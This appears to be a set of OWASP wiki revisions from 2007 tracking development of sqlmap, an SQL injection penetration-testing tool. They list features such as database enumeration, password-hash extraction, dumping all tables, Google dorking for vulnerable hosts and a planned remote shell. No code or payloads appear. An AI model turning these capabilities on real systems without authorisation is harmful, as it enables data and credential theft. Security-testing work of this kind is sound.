* '''[SpoC]''' Improved logging functionality: passed from banal ''print'' to Python native logging library
* Added DBMS fingerprint based also upon HTML error messages parsing by a ''xml.sax'' function/class (defined in ''lib/parser.py'') which read an XML file defining default error messages for each supported DBMS
* Added the possibility to specify ''mssql'', ''pgsql'' as ''--remote-dbms'' values

=== June 2007 ===

* '''[SpoC]''' Improved UNION SELECT check so now it works with five different DBMS because it uses the ''xml/errors.xml'' file to recognize HTML error messages and correctly identify if the inband SQL injection performed provided good results or not
* Updated documentation
* Layout fixes

=== July 2007 ===

* '''[SpoC]''' Extended inband SQL injection functionality (''--union-use'') to all other possible queries since it only worked with ''-e'' and ''--file'' on all DMBS plugins
* '''[SpoC]''' Added a fuzzer function with the aim to parse html page looking for standard database error messages consequently improving database fingerprinting (''txt/fuzz_vectors.txt'', ''Common.passiveFuzzing()'', ''lib/settings.py'' and DBMS plugins)
* '''[SpoC]''' Reviewed HTTP request library (''lib/request.py'') to support the extended inband SQL injection functionality. Splitted ''getValue()'' into ''getInband()'' and ''getBlind()''
* '''[SpoC]''' Major enhancements in common library and added ''checkForBrackets()'' method to check if the bracket(s) are needed to perform a UNION query SQL injection attack
* Implemented ''--dump-all'' functionality to dump entire DBMS data from all databases tables
* Imlemented in ''Dump.dbTableValues()'' method the CSV file dumped data automatic saving in ''csv/'' folder by default
* Added DB2, Informix and Sybase DBMS error messages and minor improvements in ''xml/errors.xml''
* Renamed DMBS plugins

=== September 2007 ===

* Major improvement in all three DBMS plugins so now sqlmap does not get entire databases' tables structure when all of database/table/column are specified to be dumped. Some more minor fixes in all three DBMS plugins
* Important fixes in ''lib/option.py'' to make sqlmap properly work also with python 2.5 and handle the CSV dump files creation work also under Windows operating system, function ''__setCSVDir()'' and fixed also in ''lib/dump.py''
* Minor enhancement in ''lib/injection.py'' to randomize the number requested to test the presence of a SQL injection affected parameter and implemented the possibilities to break (''q'') the for cycle when using the google dork option (''-g'')
* Minor fix in ''lib/request.py'' to properly encode the url to request in case the "fixed" part of the url has blank spaces
* More minor layout enhancements in some libraries
* Updated ChangeLog and TODO documentation files

=== October 2007 ===

* '''[SpoC]''' Added support to extract database users password hash on Microsoft SQL Server
* Added support to exclude DBMS system databases' when enumeration tables and dumping their entries, ''--exclude-sysdbs''
* Major code refactoring: strongly slightned and adapted plugins code and DBMS strictly specific methods, centralized the queries method to ''lib/query.php'' and the queries to an XML file, ''xml/queries.xml'', implemented a function and a class to parse such XML file, renamed a lot of functions and variables to let the name be more self explained
* Minor fix in other libraries to avoid ''extra'' parameter when calling ''UnionUse.unionUse()''
* Enhancement in plugins so the column type is not more enumerated when it's not necessary to dump table entries, since we need to know in this case only the column name
* Major fix in plugins and in ''lib/dump.py'' to sort both column names and entries when dumping table entries
* Major fix in plugins to correctly handle the ''-C'' command line argument to dump table values from
* Code refactoring in ''lib/request.py'' ''getInband()'' method
* Major code review and restyling in plugins
* Minor layout improvement in ''lib/resume.py''
* Minor fix in ''getValue()'' call in plugins
* Minor fix in ''lib/option.py'' to correctly handle one-line User-Agent file
* Added ''__cleanupParameters()'' method in ''lib/option.py''
* Some enhancement in ''lib/dump.py'' to correctly handle also the ''-e'' command line argument
* Updated ChangeLog, TODO and THANKS documentation files

== Links ==

* [http://sqlmap.svn.sourceforge.net/viewvc/*checkout*/sqlmap/doc/ChangeLog sqlmap ChangeLog]
* [http://sqlmap.svn.sourceforge.net/viewvc/sqlmap?view=rev sqlmap last SVN revision log message]

User:Inquis

2007-10-11T12:56:30Z

Inquis:

==== Who I am ====

My name is Bernardo, I am originally from Rio de Janeiro (Brazil), but I have been living for almost all of my life in the north-east of Italy. I spent part of the last years researching on web application insecurity taking over the [http://sqlmap.sourceforge.net sqlmap] development since December 2006. Actually I work as security software developer and researcher for an information security company in Italy where I mostly deal with vulnerability assessment and penetration test.

==== Links ====

* My [http://bernardodamele.blogspot.com/ blog]
* My [mailto:bernardo.damele@gmail.com email address]
* My Skype contact: inquis
* My [http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007_Applications#Bernardo_-_sqlmap sqlmap application] to the [http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007 OWASP Spring of Code 2007], its [http://www.owasp.org/index.php/SpoC_007_-_SqlMap OWASP page] and its [http://www.owasp.org/index.php/SpoC_007_-_SQLMap_-_Progress_Page Progress Page]

SpoC 007 - SqlMap

2007-10-11T11:27:48Z

Inquis:

''''[http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007_Selection Back to SpoC 007 Selection page]'''

'''AoC Candidate''': Bernardo Damele

'''Project coordinator''': Dinis Cruz

'''Project Progress''': 80% Complete, [[SpoC 007 - SQLMap - Progress Page|Progress Page]]

== Bernardo Damele - SQLMap ==

=== Executive Summary ===

[http://sqlmap.sourceforge.net sqlmap] is an automatic blind SQL injection tool, developed in python, capable to perform an active database management system fingerprint, enumerate entire remote databases and much more. The aim of this project is to implement a fully functional database management system tool which takes advantages of web application programming security flaws which lead to SQL injection vulnerabilities.

=== Objectives for OWASP Spring of Code 2007 ===

* Add support for Oracle database management system
* Add support to extract database users password hash
* Extend inband SQL injection functionality to all other possible queries
* Add Microsoft SQL Server database fingerprint
* Add a fuzzer class with the aim to parse html page looking for standard database error messages consequently improving database fingerprinting
* Add support for SQL injection on HTTP ''Cookie'' and ''User-Agent'' headers
* Add support for query ETA (Estimated Time of Arrival) real time calculation
* Improve Google dorking support to take advantage of remote hosts affected by SQL injection to perform other command line argument actions
* Improve logging functionality

=== Long-term vision for the project ===

Make sqlmap available as an easy-to-use enumeration and penetration testing tool to the OWASP community extending its functionality to exploit SQL injection vulnerabilities to provide a remote shell on the affected web application database server when possible. In the long run I would also like to develop a graphical user interface.

=== Why I should be sponsored for the project ===

I have good python programming skills and some years of experience in computer networks security. I spent most of the last year researching on web application insecurity taking over the [http://sqlmap.svn.sourceforge.net/viewvc/sqlmap/ sqlmap development] since December 2006. Actually I work as software developer at an information security company in Italy where I mostly deal with vulnerability assessment.

=== Links ===

* [http://sqlmap.sourceforge.net sqlmap homepage]
* [http://sqlmap.svn.sourceforge.net/viewvc/sqlmap/ sqlmap SVN repository web interface]
* [https://sourceforge.net/project/showfiles.php?group_id=171598&package_id=196107 sqlmap SourceForge File List page]
* [http://sqlmap.sourceforge.net/dev/index.html sqlmap development documentation]

'''[http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007_Selection Back to SpoC 007 Selection page]'''

SpoC 007 - SQLMap - Progress Page

2007-10-11T11:27:20Z

Inquis:

== Objectives for OWASP Spring of Code 2007 ==

=== Accomplished objectives at 11st of October 2007 ===

* '''[100%]''' Add support to extract database users password hash
* '''[100%]''' Extend inband SQL injection functionality to all other possible queries
* '''[100%]''' Add Microsoft SQL Server database fingerprint
* '''[100%]''' Add a fuzzer class with the aim to parse html page looking for standard database error messages consequently improving database fingerprinting
* '''[100%]''' Add support for query ETA (Estimated Time of Arrival) real time calculation
* '''[100%]''' Improve Google dorking support to take advantage of remote hosts affected by SQL injection to perform other command line argument actions
* '''[100%]''' Improve logging functionality

=== Ongoing work at 11st of October 2007 ===

* '''[30%]''' Add support for Oracle database management system
* '''[0%]''' Add support for SQL injection on HTTP ''Cookie'' and ''User-Agent'' headers

== Changes in sqlmap during OWASP Spring of Code 2007 ==

=== May 2007 ===

* '''[SpoC]''' Added support to extract database users password hash on MySQL and PostgreSQL
* '''[SpoC]''' Improved Google dorking support to take advantage of remote hosts affected by SQL injection to perform other command line argument actions
* '''[SpoC]''' Added support for query ETA (Estimated Time of Arrival) real time calculation (''--eta'')
* '''[SpoC]''' Added Microsoft SQL Server extensive DBMS fingerprint checks based upon extensive infogathering on ''@@version'' matching on an XML file to get also the exact patching level of the DBMS
* '''[SpoC]''' Improved logging functionality: passed from banal ''print'' to Python native logging library
* Added DBMS fingerprint based also upon HTML error messages parsing by a ''xml.sax'' function/class (defined in ''lib/parser.py'') which read an XML file defining default error messages for each supported DBMS
* Added the possibility to specify ''mssql'', ''pgsql'' as ''--remote-dbms'' values

=== June 2007 ===

* '''[SpoC]''' Improved UNION SELECT check so now it works with five different DBMS because it uses the ''xml/errors.xml'' file to recognize HTML error messages and correctly identify if the inband SQL injection performed provided good results or not
* Updated documentation
* Layout fixes

=== July 2007 ===

* '''[SpoC]''' Extended inband SQL injection functionality (''--union-use'') to all other possible queries since it only worked with ''-e'' and ''--file'' on all DMBS plugins
* '''[SpoC]''' Added a fuzzer function with the aim to parse html page looking for standard database error messages consequently improving database fingerprinting (''txt/fuzz_vectors.txt'', ''Common.passiveFuzzing()'', ''lib/settings.py'' and DBMS plugins)
* '''[SpoC]''' Reviewed HTTP request library (''lib/request.py'') to support the extended inband SQL injection functionality. Splitted ''getValue()'' into ''getInband()'' and ''getBlind()''
* '''[SpoC]''' Major enhancements in common library and added ''checkForBrackets()'' method to check if the bracket(s) are needed to perform a UNION query SQL injection attack
* Implemented ''--dump-all'' functionality to dump entire DBMS data from all databases tables
* Imlemented in ''Dump.dbTableValues()'' method the CSV file dumped data automatic saving in ''csv/'' folder by default
* Added DB2, Informix and Sybase DBMS error messages and minor improvements in ''xml/errors.xml''
* Renamed DMBS plugins

=== September 2007 ===

* Major improvement in all three DBMS plugins so now sqlmap does not get entire databases' tables structure when all of database/table/column are specified to be dumped. Some more minor fixes in all three DBMS plugins
* Important fixes in ''lib/option.py'' to make sqlmap properly work also with python 2.5 and handle the CSV dump files creation work also under Windows operating system, function ''__setCSVDir()'' and fixed also in ''lib/dump.py''
* Minor enhancement in ''lib/injection.py'' to randomize the number requested to test the presence of a SQL injection affected parameter and implemented the possibilities to break (''q'') the for cycle when using the google dork option (''-g'')
* Minor fix in ''lib/request.py'' to properly encode the url to request in case the "fixed" part of the url has blank spaces
* More minor layout enhancements in some libraries
* Updated ChangeLog and TODO documentation files

=== October 2007 ===

* '''[SpoC]''' Added support to extract database users password hash on Microsoft SQL Server
* Added support to exclude DBMS system databases' when enumeration tables and dumping their entries, ''--exclude-sysdbs''
* Enhancement in plugins so the column type is not more enumerated when it's not necessary to dump table entries, since we need to know in this case only the column name
* Major fix in plugins and in ''lib/dump.py'' to sort both column names and entries when dumping table entries
* Major fix in plugins to correctly handle the ''-C'' command line argument to dump table values from
* Code refactoring in ''lib/request.py'' ''getInband()'' method
* Major code review and restyling in plugins
* Minor layout improvement in ''lib/resume.py''
* Minor fix in ''getValue()'' call in plugins
* Minor fix in ''lib/option.py'' to correctly handle one-line User-Agent file
* Added ''__cleanupParameters()'' method in ''lib/option.py''
* Some enhancement in ''lib/dump.py'' to correctly handle also the ''-e'' command line argument
* Updated ChangeLog, TODO and THANKS documentation files

== Links ==

* [http://sqlmap.svn.sourceforge.net/viewvc/*checkout*/sqlmap/doc/ChangeLog sqlmap ChangeLog]
* [http://sqlmap.svn.sourceforge.net/viewvc/sqlmap?view=rev sqlmap last SVN revision log message]

SpoC 007 - SQLMap - Progress Page

2007-10-11T11:18:02Z

Inquis:

== Objectives for OWASP Spring of Code 2007 ==

=== Accomplished objectives at 30th of July 2007 ===

* '''[100%]''' Extend inband SQL injection functionality to all other possible queries
* '''[100%]''' Add support to extract database users password hash
* '''[100%]''' Add Microsoft SQL Server database fingerprint
* '''[100%]''' Add a fuzzer class with the aim to parse html page looking for standard database error messages consequently improving database fingerprinting
* '''[100%]''' Add support for query ETA (Estimated Time of Arrival) real time calculation
* '''[100%]''' Improve Google dorking support to take advantage of remote hosts affected by SQL injection to perform other command line argument actions
* '''[100%]''' Improve logging functionality

=== Ongoing work at 11st of October 2007 ===

* '''[30%]''' Add support for Oracle database management system
* '''[0%]''' Add support for SQL injection on HTTP ''Cookie'' and ''User-Agent'' headers

== Changes in sqlmap during OWASP Spring of Code 2007 ==

=== May 2007 ===

* '''[SpoC]''' Added support to extract database users password hash on MySQL and PostgreSQL
* '''[SpoC]''' Improved Google dorking support to take advantage of remote hosts affected by SQL injection to perform other command line argument actions
* '''[SpoC]''' Added support for query ETA (Estimated Time of Arrival) real time calculation (''--eta'')
* '''[SpoC]''' Added Microsoft SQL Server extensive DBMS fingerprint checks based upon extensive infogathering on ''@@version'' matching on an XML file to get also the exact patching level of the DBMS
* '''[SpoC]''' Improved logging functionality: passed from banal ''print'' to Python native logging library
* Added DBMS fingerprint based also upon HTML error messages parsing by a ''xml.sax'' function/class (defined in ''lib/parser.py'') which read an XML file defining default error messages for each supported DBMS
* Added the possibility to specify ''mssql'', ''pgsql'' as ''--remote-dbms'' values

=== June 2007 ===

* '''[SpoC]''' Improved UNION SELECT check so now it works with five different DBMS because it uses the ''xml/errors.xml'' file to recognize HTML error messages and correctly identify if the inband SQL injection performed provided good results or not
* Updated documentation
* Layout fixes

=== July 2007 ===

* '''[SpoC]''' Extended inband SQL injection functionality (''--union-use'') to all other possible queries since it only worked with ''-e'' and ''--file'' on all DMBS plugins
* '''[SpoC]''' Added a fuzzer function with the aim to parse html page looking for standard database error messages consequently improving database fingerprinting (''txt/fuzz_vectors.txt'', ''Common.passiveFuzzing()'', ''lib/settings.py'' and DBMS plugins)
* '''[SpoC]''' Reviewed HTTP request library (''lib/request.py'') to support the extended inband SQL injection functionality. Splitted ''getValue()'' into ''getInband()'' and ''getBlind()''
* '''[SpoC]''' Major enhancements in common library and added ''checkForBrackets()'' method to check if the bracket(s) are needed to perform a UNION query SQL injection attack
* Implemented ''--dump-all'' functionality to dump entire DBMS data from all databases tables
* Imlemented in ''Dump.dbTableValues()'' method the CSV file dumped data automatic saving in ''csv/'' folder by default
* Added DB2, Informix and Sybase DBMS error messages and minor improvements in ''xml/errors.xml''
* Renamed DMBS plugins

=== September 2007 ===

* Major improvement in all three DBMS plugins so now sqlmap does not get entire databases' tables structure when all of database/table/column are specified to be dumped. Some more minor fixes in all three DBMS plugins
* Important fixes in ''lib/option.py'' to make sqlmap properly work also with python 2.5 and handle the CSV dump files creation work also under Windows operating system, function ''__setCSVDir()'' and fixed also in ''lib/dump.py''
* Minor enhancement in ''lib/injection.py'' to randomize the number requested to test the presence of a SQL injection affected parameter and implemented the possibilities to break (''q'') the for cycle when using the google dork option (''-g'')
* Minor fix in ''lib/request.py'' to properly encode the url to request in case the "fixed" part of the url has blank spaces
* More minor layout enhancements in some libraries
* Updated ChangeLog and TODO documentation files

=== October 2007 ===

* '''[SpoC]''' Added support to extract database users password hash on Microsoft SQL Server
* Added support to exclude DBMS system databases' when enumeration tables and dumping their entries, ''--exclude-sysdbs''
* Enhancement in plugins so the column type is not more enumerated when it's not necessary to dump table entries, since we need to know in this case only the column name
* Major fix in plugins and in ''lib/dump.py'' to sort both column names and entries when dumping table entries
* Major fix in plugins to correctly handle the ''-C'' command line argument to dump table values from
* Code refactoring in ''lib/request.py'' ''getInband()'' method
* Major code review and restyling in plugins
* Minor layout improvement in ''lib/resume.py''
* Minor fix in ''getValue()'' call in plugins
* Minor fix in ''lib/option.py'' to correctly handle one-line User-Agent file
* Added ''__cleanupParameters()'' method in ''lib/option.py''
* Some enhancement in ''lib/dump.py'' to correctly handle also the ''-e'' command line argument
* Updated ChangeLog, TODO and THANKS documentation files

== Links ==

* [http://sqlmap.svn.sourceforge.net/viewvc/*checkout*/sqlmap/doc/ChangeLog sqlmap ChangeLog]
* [http://sqlmap.svn.sourceforge.net/viewvc/sqlmap?view=rev sqlmap last SVN revision log message]

User:Inquis

2007-07-30T10:46:40Z

Inquis:

==== Who I am ====

My name is Bernardo, I am originally from Rio de Janeiro (Brazil). I have good python programming skills and some years of experience in computer networks security. I spent most of the last years researching on web application insecurity taking over the [http://sqlmap.sourceforge.net sqlmap] development since December 2006. Actually I work as software developer at an information security company in Italy where I mostly deal with vulnerability assessment.

==== Links ====

* My [http://www.hospitalityclub.org/~inquis/ homepage]
* My [http://bernardodamele.blogspot.com/ blog]
* My [mailto:bernardo.damele@gmail.com email address]
* My [http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007_Applications#Bernardo_-_sqlmap sqlmap application] to the [http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007 OWASP Spring of Code 2007], its [http://www.owasp.org/index.php/SpoC_007_-_SqlMap OWASP page] and its [http://www.owasp.org/index.php/SpoC_007_-_SQLMap_-_Progress_Page Progress Page]

User:Inquis

2007-07-30T10:46:14Z

Inquis:

==== Who I am ====

My name is Bernardo, I am originally from Rio de Janeiro (Brazil). I have good python programming skills and some years of experience in computer networks security. I spent most of the last years researching on web application insecurity taking over the [http://sqlmap.sourceforge.net sqlmap] development since December 2006. Actually I work as software developer at an information security company in Italy where I mostly deal with vulnerability assessment.

==== Links ====

* My [http://www.hospitalityclub.org/~inquis/ homepage]
* My [http://bernardodamele.blogspot.com/ blog]
* My [mailto:bernardo.damele@gmail.com email address]
* My [http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007_Applications#Bernardo_-_sqlmap sqlmap application] to the [http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007 OWASP Spring of Code 2007], its [http://www.owasp.org/index.php/SpoC_007_-_SqlMap OWASP page] and [http://www.owasp.org/index.php/SpoC_007_-_SQLMap_-_Progress_Page Progress Page]

OWASP Spring Of Code 2007 - Projects

2007-07-30T10:35:16Z

Inquis:

== All SpoC Projects ==

{| class="wikitable" WIDTH=100%
|-
! SpoC Project Name
! Author
! Confirmed
! Status
! Coordinated by
|-

|-
! [[SpoC 007 - The OWASP Web Security Certification Framework|The OWASP Web Security Certification Framework]]
| Mark Curphey
| Yes
| 45%
| OWASP Board

|-
! [[SpoC 007 - SqlMap|SqlMap]]
| Bernardo Damele
| Yes
| 70% (to review)
| Dinis Cruz

|-
! [[SpoC 007 - OWASP Site Generator|OWASP Site Generator]]
| Boris
| Yes
| 0%
| Dinis Cruz

|-
! [[SpoC 007 - Attacks Reference Guide|Attacks Reference Guide]]
| NSRAV Security Research Group
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - The Scholastic Application Security Assessment Project|The Scholastic Application Security Assessment Project]]
| Eric Sheridan and
Dr. Goran Trajkovski
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - Inspekt|Inspekt: Input filtering and validation library for PHP]]
| Ed Finkler
| Yes
| 50% (to review)
| Andrew v d Stock

|-
! [[SpoC 007 - Code review Project|Code review Project]]
| Eoin Keary
| Yes
| 25%
| Dinis Cruz

|-
! [[SpoC 007 - OWASP Certification Project|OWASP Certification Project]]
| Matteo Meucci
| Yes
| 0%
| Dinis Cruz

|-
! [[SpoC 007 - OWASP Education Project|OWASP Education Project]]
| Sebastien Deleersnyder
| Yes
| 45%
| Dinis Cruz

|-
! [[SpoC 007 - OWASP The Anti-Samy Project|OWASP The Anti-Samy Project]]
| Arshan Dabirsiaghi
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - Security throughout the SDLC|Security throughout the SDLC]]
| Keith Casey
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - OWASP WebGoat Solutions Guide|OWASP WebGoat Solutions Guide]]
| Erwin Geirnaert
| Yes
| 90%
| Jeff Williams

|-
! [[SpoC 007 - OWASP WeBekci Project|OWASP WeBekci Project]]
| Bunyamin Demir
| Yes
| 40%
| Ivan Ristic

|-
! [[SpoC 007 - Python Tainted Mode|Python Tainted Mode]]
| Denis
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - WebScarab NG Security Test Automation|WebScarab NG Security Test Automation]]
| Darren Edmonds
| Yes
| 0%
| Jeff Williams

|-
! [[SpoC 007 - Refresh Attacks list|Refresh Attacks list]]
| Przemyslaw 'rezos' Skowron
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - Best Practices & Countermeasures|Best Practices & Countermeasures]]
| Jim
| Yes
| 0%
| TBA

|-
! [[SpoC 007 - OWASP Brand|OWASP brand]]
| Paulo Coimbra
| Yes
| 0%
| Dinis Cruz

|-
! [[SpoC 007 - Web Application Security put into practice|Web Application Security put into practice]]
| Heiko Webers
| Yes
| 60%
| TBA

|-
! [[SpoC 007 - OWASP JBroFuzz Project|OWASP JBroFuzz Project]]
| Subere
| Yes
| 40%
| TBA

|-
! [[SpoC 007 - Owasp Orizon Project|Owasp Orizon Project]]
| Paolo Perego
| Yes
| 45%
| Dinis Cruz

|-
! [[SpoC 007 - Enigform: Firefox Addon for OpenPGP signing of HTTP requests|Enigform: Firefox Addon for OpenPGP signing of HTTP requests]]
| Arturo (Buanzo) Busleiman
| Yes
| half term review: done
| Dinis Cruz

|-
! [[SpoC 007 - OWASP LiveCD Education Project|OWASP LiveCD Education Project]]
| Josh Sweeney
| Yes
| 50% (to review)
| Eoin Keary

|-
! [[SpoC 007 - OWASP Java Project|OWASP Java Project]]
| Erwin Geirnaert
| Yes
| 0%
| Jeff Williams

|-
! [[SpoC 007 - OWASP LiveCD Project|OWASP LiveCD Project]]
| Joshua Perrymon
| Yes
| 0%
| Eoin Keary

|-
! [[SpoC 007 - Interim @ Aspect Offices|Interim @ Aspect Offices]]
| Andy Gocke
| Yes
| 0%
| Jeff Williams

|-
! [[SpoC 007 - 10x 1000USD to FOSS projects we all use |10x 1000USD to FOSS projects we all use ]]
| (tbd)
| No
| 0%
| Dinis Cruz

|-
! [[SpoC 007 - Help with SpoC project management|Help with SpoC project management]]
| Paulo Coimbra
| Yes
| 0%
| Dinis Cruz

|}

SpoC 007 - SqlMap

2007-07-30T10:34:42Z

Inquis:

''''[http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007_Selection Back to SpoC 007 Selection page]'''

'''AoC Candidate''': Bernardo Damele

'''Project coordinator''': Dinis Cruz

'''Project Progress''': 70% Complete, [[SpoC 007 - SQLMap - Progress Page|Progress Page]]

== Bernardo Damele - SQLMap ==

=== Executive Summary ===

[http://sqlmap.sourceforge.net sqlmap] is an automatic blind SQL injection tool, developed in python, capable to perform an active database management system fingerprint, enumerate entire remote databases and much more. The aim of this project is to implement a fully functional database management system tool which takes advantages of web application programming security flaws which lead to SQL injection vulnerabilities.

=== Objectives for OWASP Spring of Code 2007 ===

* Add support for Oracle database management system
* Add support to extract database users password hash
* Extend inband SQL injection functionality to all other possible queries
* Add Microsoft SQL Server database fingerprint
* Add a fuzzer class with the aim to parse html page looking for standard database error messages consequently improving database fingerprinting
* Add support for SQL injection on HTTP ''Cookie'' and ''User-Agent'' headers
* Add support for query ETA (Estimated Time of Arrival) real time calculation
* Improve Google dorking support to take advantage of remote hosts affected by SQL injection to perform other command line argument actions
* Improve logging functionality

=== Long-term vision for the project ===

Make sqlmap available as an easy-to-use enumeration and penetration testing tool to the OWASP community extending its functionality to exploit SQL injection vulnerabilities to provide a remote shell on the affected web application database server when possible. In the long run I would also like to develop a graphical user interface.

=== Why I should be sponsored for the project ===

I have good python programming skills and some years of experience in computer networks security. I spent most of the last year researching on web application insecurity taking over the [http://sqlmap.svn.sourceforge.net/viewvc/sqlmap/ sqlmap development] since December 2006. Actually I work as software developer at an information security company in Italy where I mostly deal with vulnerability assessment.

=== Links ===

* [http://sqlmap.sourceforge.net sqlmap homepage]
* [http://sqlmap.svn.sourceforge.net/viewvc/sqlmap/ sqlmap SVN repository web interface]
* [https://sourceforge.net/project/showfiles.php?group_id=171598&package_id=196107 sqlmap SourceForge File List page]
* [http://sqlmap.sourceforge.net/dev/index.html sqlmap development documentation]

'''[http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007_Selection Back to SpoC 007 Selection page]'''

SpoC 007 - SQLMap - Progress Page

2007-07-30T10:34:15Z

Inquis:

== Objectives for OWASP Spring of Code 2007 ==

=== Accomplished objectives at 30th of July 2007 ===

* '''[100%]''' Extend inband SQL injection functionality to all other possible queries
* '''[100%]''' Add Microsoft SQL Server database fingerprint
* '''[100%]''' Add a fuzzer class with the aim to parse html page looking for standard database error messages consequently improving database fingerprinting
* '''[100%]''' Add support for query ETA (Estimated Time of Arrival) real time calculation
* '''[100%]''' Improve Google dorking support to take advantage of remote hosts affected by SQL injection to perform other command line argument actions
* '''[100%]''' Improve logging functionality

=== Ongoing work at 30th of July 2007 ===

* '''[20%]''' Add support for Oracle database management system
* '''[60%]''' Add support to extract database users password hash (done for MySQL and PostgreSQL, in progress for Microsoft SQL Server)
* '''[0%]''' Add support for SQL injection on HTTP ''Cookie'' and ''User-Agent'' headers

== Changes in sqlmap during OWASP Spring of Code 2007 ==

=== May 2007 ===

* '''[SpoC]''' Added support to extract database users password hash on MySQL and PostgreSQL
* '''[SpoC]''' Improved Google dorking support to take advantage of remote hosts affected by SQL injection to perform other command line argument actions
* '''[SpoC]''' Added support for query ETA (Estimated Time of Arrival) real time calculation (''--eta'')
* '''[SpoC]''' Added Microsoft SQL Server extensive DBMS fingerprint checks based upon extensive infogathering on ''@@version'' matching on an XML file to get also the exact patching level of the DBMS
* '''[SpoC]''' Improved logging functionality: passed from banal ''print'' to Python native logging library
* Added DBMS fingerprint based also upon HTML error messages parsing by a ''xml.sax'' function/class (defined in ''lib/parser.py'') which read an XML file defining default error messages for each supported DBMS
* Added the possibility to specify ''mssql'', ''pgsql'' as ''--remote-dbms'' values

=== June 2007 ===

* '''[SpoC]''' Improved UNION SELECT check so now it works with five different DBMS because it uses the ''xml/errors.xml'' file to recognize HTML error messages and correctly identify if the inband SQL injection performed provided good results or not
* Updated documentation
* Layout fixes

=== July 2007 ===

* '''[SpoC]''' Extended inband SQL injection functionality (''--union-use'') to all other possible queries since it only worked with ''-e'' and ''--file'' on all DMBS plugins
* '''[SpoC]''' Added a fuzzer function with the aim to parse html page looking for standard database error messages consequently improving database fingerprinting (''txt/fuzz_vectors.txt'', ''Common.passiveFuzzing()'', ''lib/settings.py'' and DBMS plugins)
* '''[SpoC]''' Reviewed HTTP request library (''lib/request.py'') to support the extended inband SQL injection functionality. Splitted ''getValue()'' into ''getInband()'' and ''getBlind()''
* '''[SpoC]''' Major enhancements in common library and added ''checkForBrackets()'' method to check if the bracket(s) are needed to perform a UNION query SQL injection attack
* Implemented ''--dump-all'' functionality to dump entire DBMS data from all databases tables
* Imlemented in ''Dump.dbTableValues()'' method the CSV file dumped data automatic saving in ''csv/'' folder by default
* Added DB2, Informix and Sybase DBMS error messages and minor improvements in ''xml/errors.xml''
* Renamed DMBS plugins

== Links ==

* [http://sqlmap.svn.sourceforge.net/viewvc/*checkout*/sqlmap/doc/ChangeLog sqlmap ChangeLog]
* [http://sqlmap.svn.sourceforge.net/viewvc/sqlmap?view=rev sqlmap last SVN revision log message]

SpoC 007 - SQLMap - Progress Page

2007-07-16T11:48:56Z

Inquis:

=== Roadmap ===

==== Accomplished objectives at 16th of July 2007 ====

* '''[100%]''' Extend inband SQL injection functionality to all other possible queries
* '''[100%]''' Add Microsoft SQL Server database fingerprint
* '''[100%]''' Add support for query ETA (Estimated Time of Arrival) real time calculation
* '''[100%]''' Improve Google dorking support to take advantage of remote hosts affected by SQL injection to perform other command line argument actions
* '''[100%]''' Improve logging functionality

==== Ongoing work at 16th of July 2007 ====

* '''[10%]''' Add support for Oracle database management system
* '''[60%]''' Add support to extract database users password hash (done for MySQL and PostgreSQL, in progress for Microsoft SQL Server)
* '''[60%]''' Add a fuzzer class with the aim to parse html page looking for standard database error messages consequently improving database fingerprinting
* '''[0%]''' Add support for SQL injection on HTTP ''Cookie'' and ''User-Agent'' headers

=== Links ===

* [http://sqlmap.svn.sourceforge.net/viewvc/*checkout*/sqlmap/doc/ChangeLog sqlmap ChangeLog]
* [http://sqlmap.svn.sourceforge.net/viewvc/sqlmap?view=rev sqlmap last SVN revision log message]

SpoC 007 - SQLMap - Progress Page

2007-07-16T11:46:31Z

Inquis:

=== Roadmap ===

==== Accomplished objectives at 16th of July 2007 ====

* '''[100%]''' Extend inband SQL injection functionality to all other possible queries
* '''[100%]''' Add Microsoft SQL Server database fingerprint
* '''[100%]''' Add support for query ETA (Estimated Time of Arrival) real time calculation
* '''[100%]''' Improve Google dorking support to take advantage of remote hosts affected by SQL injection to perform other command line argument actions
* '''[100%]''' Improve logging functionality

==== Ongoing work at 16th of July 2007 ====

* '''[10%]''' Add support for Oracle database management system
* '''[60%]''' Add support to extract database users password hash on MySQL and PostgreSQL
* '''[60%]''' Add a fuzzer class with the aim to parse html page looking for standard database error messages consequently improving database fingerprinting
* '''[0%]''' Add support for SQL injection on HTTP ''Cookie'' and ''User-Agent'' headers

=== Links ===

* [http://sqlmap.svn.sourceforge.net/viewvc/*checkout*/sqlmap/doc/ChangeLog sqlmap ChangeLog]
* [http://sqlmap.svn.sourceforge.net/viewvc/sqlmap?view=rev sqlmap last SVN revision log message]

SpoC 007 - SqlMap

2007-07-16T11:30:47Z

Inquis:

''''[http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007_Selection Back to SpoC 007 Selection page]'''

'''AoC Candidate''': Bernardo Damele

'''Project coordinator''': Dinis Cruz

'''Project Progress''': 60% Complete, [[SpoC 007 - SQLMap - Progress Page|Progress Page]]

== Bernardo Damele - SQLMap ==

=== Executive Summary ===

[http://sqlmap.sourceforge.net sqlmap] is an automatic blind SQL injection tool, developed in python, capable to perform an active database management system fingerprint, enumerate entire remote databases and much more. The aim of this project is to implement a fully functional database management system tool which takes advantages of web application programming security flaws which lead to SQL injection vulnerabilities.

=== Objectives for OWASP Spring of Code 2007 ===

* Add support for Oracle database management system
* Add support to extract database users password hash
* Extend inband SQL injection functionality to all other possible queries
* Add Microsoft SQL Server database fingerprint
* Add a fuzzer class with the aim to parse html page looking for standard database error messages consequently improving database fingerprinting
* Add support for SQL injection on HTTP ''Cookie'' and ''User-Agent'' headers
* Add support for query ETA (Estimated Time of Arrival) real time calculation
* Improve Google dorking support to take advantage of remote hosts affected by SQL injection to perform other command line argument actions
* Improve logging functionality

=== Long-term vision for the project ===

